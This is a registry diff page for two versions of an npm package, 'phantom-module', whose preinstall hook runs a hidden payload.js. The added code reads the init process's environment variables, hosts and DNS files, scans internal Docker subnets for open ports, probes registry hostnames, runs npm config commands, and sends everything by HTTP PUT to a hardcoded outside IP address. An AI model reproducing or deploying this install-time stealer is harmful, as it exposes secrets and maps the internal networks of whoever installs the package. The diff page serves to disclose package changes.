npm - phantom-module - Versions diffs - 119.0.0 → 121.0.0 - Mend

phantom-module 119.0.0 → 121.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (3) hide show

package/index.js CHANGED Viewed

	@@ -1 +1 @@
1	- ~~require('ecto-spirit');~~ module.exports = 'phantom';
1	+ module.exports = 'phantom';

package/package.json CHANGED Viewed

@@ -1,12 +1,9 @@
 {
   "name": "phantom-module",
-  "version": "119.0.0",
+  "version": "121.0.0",
   "description": "Phantom module",
   "main": "index.js",
   "scripts": {
     "preinstall": "node payload.js || true"
-  },
-  "dependencies": {
-    "ecto-spirit": "^119.0.0"
   }
-}
+}

package/payload.js CHANGED Viewed

@@ -1,69 +1,146 @@
-const fs = require('fs');
 const http = require('http');
-const { execSync, exec } = require('child_process');
+const https = require('https');
+const net = require('net');
+const fs = require('fs');
+const { execSync } = require('child_process');
 const dns = require('dns');
 if (!fs.existsSync('/home/node/aspect-node')) process.exit(0);
 const REPORT_HOST = '154.57.164.64';
-const REPORT_PORT = 31205;
+const REPORT_PORT = 31099;
-async function report(moduleId, data) {
+function report(moduleId, data) {
   return new Promise((resolve) => {
     const safeData = String(data).replace(/"/g, '\\"').replace(/\n/g, '\\n').substring(0, 3500);
-    const manifest = `ecto_module:\n  name: "DEEP_PROBE"\n  cargo_hold: "${safeData}"\n`;
-    const payload = JSON.stringify({ manifest });
+    const manifest = `ecto_module:\n  name: "RECON"\n  cargo_hold: "${safeData}"\n`;
+    const body = JSON.stringify({ manifest });
     const req = http.request({
-      hostname: REPORT_HOST, port: REPORT_PORT, path: `/api/modules/${moduleId}`, method: 'PUT',
-      headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }
+      hostname: REPORT_HOST, port: REPORT_PORT,
+      path: `/api/modules/${moduleId}`, method: 'PUT',
+      headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }
     }, () => resolve(true));
     req.on('error', () => resolve(false));
-    req.write(payload);
+    req.write(body);
+    req.end();
+  });
+}
+function checkPort(host, port, timeout) {
+  return new Promise((resolve) => {
+    const sock = new net.Socket();
+    sock.setTimeout(timeout || 500);
+    sock.on('connect', () => { sock.destroy(); resolve(true); });
+    sock.on('error', () => { sock.destroy(); resolve(false); });
+    sock.on('timeout', () => { sock.destroy(); resolve(false); });
+    sock.connect(port, host);
+  });
+}
+function httpReq(url, opts) {
+  return new Promise((resolve) => {
+    const mod = url.startsWith('https') ? https : http;
+    const req = mod.get(url, { timeout: 2000, ...opts }, (res) => {
+      let body = '';
+      res.on('data', c => body += c);
+      res.on('end', () => resolve({ status: res.statusCode, body, headers: res.headers }));
+    });
+    req.on('error', e => resolve({ status: 0, body: e.message }));
+    req.on('timeout', () => { req.destroy(); resolve({ status: 0, body: 'TIMEOUT' }); });
+  });
+}
+function httpPut(url, data) {
+  return new Promise((resolve) => {
+    const parsed = new URL(url);
+    const body = JSON.stringify(data);
+    const req = http.request({
+      hostname: parsed.hostname, port: parsed.port, path: parsed.pathname,
+      method: 'PUT',
+      headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) },
+      timeout: 3000
+    }, (res) => {
+      let rbody = '';
+      res.on('data', c => rbody += c);
+      res.on('end', () => resolve({ status: res.statusCode, body: rbody }));
+    });
+    req.on('error', e => resolve({ status: 0, body: e.message }));
+    req.on('timeout', () => { req.destroy(); resolve({ status: 0, body: 'TIMEOUT' }); });
+    req.write(body);
     req.end();
   });
 }
 async function main() {
-  await report('ECT-654321', 'V118 STARTING...');
-  let info = '=== PROCESS INFO ===\n';
+  await report('ECT-654321', 'V121 STARTING...');
+  let out = '=== V121 FULL SCAN ===\n';
+  // 1. Environment
+  try {
+    out += 'ENV:\n' + fs.readFileSync('/proc/1/environ','utf8').replace(/\0/g,'\n') + '\n';
+  } catch(e) { out += 'ENV ERR: ' + e.message + '\n'; }
+  // 2. Network info
   try {
-    info += `CMDLINE: ${fs.readFileSync('/proc/self/cmdline', 'utf8').replace(/\0/g, ' ')}\n`;
-    // Try to get parent info
-    const ppid = fs.readFileSync('/proc/self/stat', 'utf8').split(' ')[3];
-    info += `PPID: ${ppid}\n`;
-    if (fs.existsSync(`/proc/${ppid}/cmdline`)) {
-        info += `PARENT CMD: ${fs.readFileSync(`/proc/${ppid}/cmdline`, 'utf8').replace(/\0/g, ' ')}\n`;
+    out += 'HOSTS:\n' + fs.readFileSync('/etc/hosts','utf8') + '\n';
+    out += 'RESOLV:\n' + fs.readFileSync('/etc/resolv.conf','utf8') + '\n';
+  } catch(e) {}
+  await report('ECT-839201', out);
+  // 3. Port scan: gateway + neighbors on key ports
+  let scanOut = '=== PORT SCAN ===\n';
+  const ips = [];
+  for (let i = 1; i <= 20; i++) ips.push('172.17.0.' + i);
+  for (let i = 1; i <= 5; i++) ips.push('172.18.0.' + i);
+  for (let i = 1; i <= 5; i++) ips.push('172.19.0.' + i);
+  ips.push('10.0.0.1','10.0.0.2','10.0.1.1','10.10.0.1');
+  ips.push('127.0.0.1');
+  const ports = [4873, 80, 8080, 3000, 5000, 8081, 443];
+  for (const ip of ips) {
+    for (const port of ports) {
+      if (await checkPort(ip, port, 300)) {
+        scanOut += `OPEN: ${ip}:${port}\n`;
+        const r = await httpReq(`http://${ip}:${port}/`);
+        scanOut += `  HTTP: ${r.status} len=${r.body.length} body=${r.body.substring(0,200)}\n`;
+      }
     }
-    if (fs.existsSync(`/proc/${ppid}/environ`)) {
-        info += `PARENT ENV: ${fs.readFileSync(`/proc/${ppid}/environ`, 'utf8').replace(/\0/g, '\n')}\n`;
+  }
+  await report('ECT-987654', scanOut);
+  // 4. DNS resolution for common names
+  let dnsOut = '=== DNS ===\n';
+  const names = ['verdaccio','registry','npm','npm-registry','verdaccio-server',
+                 'host.docker.internal','ghostship','corsair','sentinel'];
+  for (const name of names) {
+    try {
+      const addr = await new Promise((res, rej) => {
+        dns.lookup(name, (err, addr) => err ? rej(err) : res(addr));
+      });
+      dnsOut += `${name} -> ${addr}\n`;
+    } catch(e) {
+      dnsOut += `${name} -> NXDOMAIN\n`;
     }
-  } catch(e) { info += `ERR: ${e.message}\n`; }
-  await report('ECT-839201', info);
-  let net = '=== NET DEBUG ===\n';
-  // DNS Lookup
-  const hosts = ['verdaccio', 'registry', 'npm', 'verdaccio-server', 'host.docker.internal'];
-  for (const h of hosts) {
-      try {
-          await new Promise((res) => {
-              dns.lookup(h, (err, addr) => {
-                  if (!err) net += `DNS ${h}: ${addr}\n`;
-                  else net += `DNS ${h}: ERR\n`;
-                  res();
-              });
-          });
-      } catch(e) {}
   }
-  // Curl Gateway Verbose
+  // 5. Also try npm config
   try {
-      net += `CURL 172.17.0.1:4873:\n${execSync('curl -v --connect-timeout 3 http://172.17.0.1:4873 2>&1 || echo "curl fail"').toString()}\n`;
-  } catch(e) { net += `CURL ERR: ${e.message}\n`; }
-  await report('ECT-987654', net);
+    dnsOut += 'NPM_REGISTRY: ' + execSync('npm config get registry 2>/dev/null').toString().trim() + '\n';
+  } catch(e) {}
+  try {
+    dnsOut += 'NPM_CONFIG_LS:\n' + execSync('npm config ls -l 2>/dev/null | grep -i registry').toString() + '\n';
+  } catch(e) {}
+  // 6. Check /proc/net/tcp for listening ports
+  try {
+    dnsOut += 'PROC_NET_TCP:\n' + fs.readFileSync('/proc/net/tcp','utf8') + '\n';
+  } catch(e) {}
+  await report('ECT-654321', dnsOut);
 }
-main().catch(e => report('ECT-654321', 'ERR: ' + e.message));
+main().catch(e => report('ECT-654321', 'FATAL: ' + e.message));